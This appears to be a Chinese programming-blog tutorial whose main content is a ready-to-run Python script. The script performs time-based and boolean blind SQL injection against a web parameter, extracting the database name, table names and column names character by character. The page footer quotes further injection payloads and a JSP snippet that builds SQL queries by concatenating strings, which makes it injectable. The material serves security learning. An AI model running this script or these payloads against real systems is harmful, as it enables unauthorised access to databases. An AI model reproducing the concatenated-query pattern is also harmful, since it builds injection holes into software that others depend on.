sql注入(7), python 实现盲注爆破数据库名, 表名, 列名

已于 2023-10-14 14:23:16 修改
阅读量568 收藏
点赞数
分类专栏: 渗透测试-web漏洞 python 文章标签: sql python 数据库 渗透测试
于 2023-10-14 14:22:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/133824903
版权

python 实现盲注

该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用.

import requests, time

# 时间型盲注
def time_blind(base_url, cookie):
    for length in range(1, 20): # 测试数据库名长度 1~19
        start = time.time()
        header = {"Cookie": cookie}
        url = f"{base_url} and if(length(database())={length}, sleep(3.5), 1)"
        _ = requests.get(url=url, headers=header)
        end = time.time()
        resptime = end-start
        if int(resptime) >= 3:
            print('数据库长度为:', length)
            break
        else:
            print(url)

# 布尔型盲注爆列名
def bool_blind(base_url, cookie):
    chars = "abcdefghijklmnopqrstuvwxyz0123456789_,"
    session = requests.session()
    base_url = base_url
    header = {"Cookie": cookie}

    # 先定义猜对的时候的长度
    resp = session.get(url=base_url + " and 1=1", headers=header)
    base_len = len(resp.text)

    # 先获取数据库长度
    for db_len in range(1, 20):
        url = f"{base_url} and length(database())={db_len}"
        resp = session.get(url=url, headers=header)
        if len(resp.text) == base_len:
            break

    print(f"数据库长度:{db_len}")

    # 根据数据库长度猜名称
    db_name = ''
    for i in range(1, db_len+1):
        for c in chars:
            url = f"{base_url} and substr(database(), {i}, 1)='{c}'"
            resp = session.get(url=url, headers=header)
            if len(resp.text) == base_len:
                db_name += c
                break

    print(f"数据库名:{db_name}")

    # 根据数据库名称猜表名
    table_name = ''
    for i in range(1, 40):
        for c in chars:
            sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"
            url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"
            resp = session.get(url=url, headers=header)
            if len(resp.text) == base_len:
                table_name += c
                break

    print(f"数据库中的表名:{table_name}")

    # 猜所有表的列名
    table_list = table_name.strip().split(',')
    for table in table_list:
        column_name = ''
        for i in range(100):
            for c in chars:
                sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='{table}'"
                url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"
                resp = session.get(url=url, headers=header)
                if len(resp.text) == base_len:
                    column_name += c
                    break
        print(f"表{table}的列名:{column_name}")


if __name__ == '__main__':
    url = "http://192.168.112.200/security/read.php?id=1"
    cookie = "PHPSESSID=b4d659be5e17d948fd8e18078003d3f6"
    time_blind(base_url=url, cookie=cookie)
    # bool_blind(base_url=url, cookie=cookie)
DeltaTime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql 爆表名_CTFHub-技能树-SQL注入
weixin_39968436的博客
01-31 725
整数型注入不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。常规注入流程:爆数据库->爆表名->爆字段->使用union select获得想要知道的对应字段的内容。爆数据库1 union select database(),1 limit 1,2数据库sqli爆表名通过更改limit的值得到sqli数据库中可能藏有flag的表名1 uni...
SQL注入漏洞---表(列)的暴力破解
Ethan024的博客
04-04 624
实验平台: 皮卡丘靶场—字符型注入 payload: kobe’ and exists(select * from aa)# (1)将kobe’进行查询; (2)将and作为运算符; (3)猜测表aa是否存在,该表名是个字典。若表名存在,表达式为真;否则表达式为假。 实验步骤: 输入payload kobe’ and exists(select * from aa)#查看查看报错信息: 通过burpsuite将数据包抓下来,并且发送到intruder里面: 这里要暴力破解的对象是表名aa,因此在此处添
sql注入-爆破数据库
最新发布
Eric___Qu的博客
03-24 364
order by原理:会对列排序,当我们输入的列数超过实际拥有的列数,就会提示该列不存在。假设users表里有username,password两个字段。使用order by判断回显后(假设回显结果为2),使用。假设flag数据库里有users表,查看users表。假设需要查看的数据库为flag。
Python mysql 爆破
weixin_34161029的博客
05-13 328
缺点:不支持网段单线程#-*-coding:utf_8-*- #Date:2015/5/13 #author:sanr importMySQLdb importos importsys defREADME(): print'+'+'-'*50+'+' print'\tPythonMySQL爆破' ...
python sql延时注入脚本(从数据库到字段)
m0_61815757的博客
04-13 2624
python sql延时盲注脚本
mysql注入爆表_mysql注入语句
weixin_36098128的博客
01-19 368
一、sql注入语句爆破所有数据库:(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:(select ...
python 获取sqlite3数据库表名和表字段的实例
12-31
Python中对sqlite3数据库进行操作时,经常需要用到字段,然而对于sqlite使用select语句并不能象MySql数据库一样返回带字段的字典数据集。特别是对于一个不熟悉的sqlite数据库,写代码时如果需要借助工具查看,...
c#获得目标服务器中所有数据库表名列名实现代码
09-04
总结,C#通过SQLDMO库实现获取服务器上所有数据库表名列名,主要是通过遍历SQL Server对象模型的层次结构,使用`Databases`、`Tables`和`Columns`属性,结合适当的循环和条件判断,完成数据的检索。...
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
使用Python防止SQL注入攻击的实现示例
09-16
主要介绍了使用Python防止SQL注入攻击的实现示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Python版Mysql爆破小脚本
01-19
Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 ) import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_username = ('root','test', 'admin', 'user')#账号字典 commo
sql注入_表名列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
注入sql攻击,爆库,爆表,爆字段
zzzgd_666的博客
07-07 1249
注入sql攻击,爆库,爆表,爆字段函数注意点防范于未然, 了解它,然后避免它.用好#预编译 研究sql注入攻击的方式, 自己有空写个demo试下效果 函数 除了这个函数还有其他几个函数可以实现注入sql攻击的效果 updatexml(a,b,c) 参数a: xml文档字 参数b: xpath表达式 参数c: 替换的值 原理就是将b替换成concat函数, concat函数里又包含sql, mysq基于函数的运算法则, 应该是先执行里面的sql, 然后将查询到的值, 执行concat函数, 得到最终的字符串
SQL注入(一):数字型(手注)+利用+爆破
NSQ0207的博客
07-19 1049
查询语句:select id,email from member where username=$id
SQl注入学习
weixin_42451330的博客
06-08 913
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
SQL注入总结
CODING...
01-11 2762
最近一直在研究SQL注入攻击,现在对SQL注入进行一个总结: SQL注入的原理就不在这里赘述了,直接从攻击技巧开始: 1.手工注入猜解流程: 假设我们现在以http://ctf5.shiyanbar.com/8/index.php?id=1这个链接为例子,已知它的id是一个注入点: 我们可以大概知道它的SQL语句大概是这么写的:SELECT ID,CONTENT FROM TABLE WH
web安全学习笔记--sql基础下(sql注入
m0_64348326的博客
05-01 1989
目录 一、SQL函数 二、SQL注入类型 2-1 字符及整数型注入 2-2 报错注入 2-3 布尔及时间盲注 2-4 堆叠注入 三、WAF绕过及关键词过滤 关键词绕过 WAF绕过 sql-quine 一、SQL函数 1-1 读取函数以及导出函数(要求有读写权限以及文件绝对路径) load_file()函数可用于读取敏感文件,into outfile/dumofile导出函数可用于写webshell 读配置文件:1' union select 1,2,load_file(
SQL注入5-6(报错注入)
m0_59082970的博客
03-27 4209
目录 一.判断闭合方式 二.爆库 三.爆表名 四.爆列名 五.爆字段 一.判断闭合方式 Less-5/?id=1\ 二.爆库 Less-5/?id=1' and extractvalue(1,concat(0x7e,databse(),0x7e))--+ 三.爆表名 Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from informatio...
jsp连接数据库实现在网页中输入账户密码和数据库表名列名,输出数据库中的结果
04-23
好的,您需要在网页中输入账户密码和数据库表名列名,然后输出数据库中的结果。接下来,我将提供一个简单的 JSP 代码示例,可用于连接数据库并输出结果。 1. 首先,您需要在 JSP 页面中添加以下代码来引入 Java 数据库连接 API(JDBC): ``` <%@ page import="java.sql.*" %> ``` 2. 接下来,您需要在 JSP 页面中添加以下代码来连接到数据库: ``` <% String username = "your_username"; String password = "your_password"; String databaseName = "your_database_name"; String tableName = "your_table_name"; String columnName = "your_column_name"; String url = "jdbc:mysql://localhost/" + databaseName + "?user=" + username + "&password=" + password; Connection conn = null; PreparedStatement stmt = null; ResultSet rs = null; try { Class.forName("com.mysql.jdbc.Driver"); conn = DriverManager.getConnection(url); stmt = conn.prepareStatement("SELECT " + columnName + " FROM " + tableName); rs = stmt.executeQuery(); while (rs.next()) { out.println(rs.getString(columnName)); } } catch (SQLException ex) { ex.printStackTrace(); } catch (ClassNotFoundException ex) { ex.printStackTrace(); } finally { try { rs.close(); stmt.close(); conn.close(); } catch (SQLException ex) { ex.printStackTrace(); } } %> ``` 3. 替换代码中的用户、密码、数据库表名列名以适应您的需求。执行上述代码后,将会在页面上输出您指定列名中的所有记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值